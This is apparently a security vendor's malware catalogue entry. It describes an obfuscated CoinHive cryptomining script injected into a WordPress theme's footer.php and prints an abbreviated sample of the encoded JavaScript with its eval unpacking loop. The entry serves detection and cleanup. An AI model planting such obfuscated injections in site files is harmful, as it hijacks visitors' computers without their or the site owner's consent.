
Malware entry: malware.cryptominer.11

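Description: One of many obfuscated CoinHive JavaScript miner injections. Obfuscation of this kind usually means the miner was added without the webmaster's consent. This variant is obfuscated with the Hivelogic Enkoder: the script body is stored as an encoded string and unpacked layer by layer by the `while(x=eval(x));` loop at the end of the sample. The listing below is abbreviated where marked "skipped".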

<'script type="text/javascript">
//<'![CDATA[
<'!--
var x="function f(x​){var i,o=\"\",l=x.length;for(i=0;i<'l;i+=2) {if(i+1<'l)o+=" +
"x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f(\"ufcnitnof x({)av" +
" r,i=o\\\"\\\"o,=l.​xelgnhtl,o=;lhwli​(e.xhcraoCedtAl​(1/)3=!84{)rt{y+xx=l;=+;" +
"lc}tah​ce({)}}of(r=i-l;1>i0=i;--{)+ox=c.​ahAr(t)i};erutnro s.buts​(r,0lo;)f}\\" +
"\"(1),9\\\"\\\\\\\\V\\\\​\\\\P\\\\KC3V02\\\\\\\\26\\\\04\\\\01\\\\\\\\26\\\\" +
"00\\\\00\\\\\\\\21\\\\0N\\\\\\\\\\\\\\\\\\\\21​00\\\\\\\\0/00\\\\\\\\.&05\\\\"+
..skipped...
"N9\\\\t4\\\\00\\\\\\\\O**421\\\\03\\\\02\\\\\\\\A900\\\\0%\\\\B636\\\\04\\\\"+
"-/00\\\\0\\\\\\\\\\\\\\\\Z\\\\31\\\\0>\\\\BP0L02\\\\\\\\27\\\\06\\\\01\\\\\\"+
"\\\\\\r&\\\\202203\\\\\\\\<'t>.36\\\\0;\\\\<'=21\\\\0q\\\\*'m kq,8.&e+\\\\6\\" +
"\\\\\"4\\\\4503\\\\\\\\bQ`O05\\\\0N\\\\​QIUE0F01\\\\\\\\n]lC21\\\\0Z\\\\E]IY" +
"7Z00\\\\\\\\33\\\\00\\\\03\\\\\\\\07\\\\0x\\\\HP17\\\\0N\\\​\svy3smvqy~;v{q?" +
...skipped...
"\\\\\\27\\\\03\\\\02\\\\\\\\6M02\\\\\\\\17\\\\05\\\\00\\\\\\\\+23>\\\\?(\\\""+
"}fo;n uret​}r);+)y+^(i)t(eAodrCha​.c(xdeCoarChomfrg​.intr=So+7;12%={y+)i+l;i<'0" +
";i=r(foh;gten.l=x,l\\\"\\\\\\\"\\\\o=i,r va){,y(x fontincfu)\\\"\")"         ;
while(x=eval​(x));
//-->
//]]>
<'/script>

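We found this code at the bottom of the active WordPress theme's footer.php file. Since the theme footer is typically included on every page, the injected script would load for visitors site-wide.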


Affecting: Mostly WordPress sites.

Mitigation: How to clean a hacked WordPress site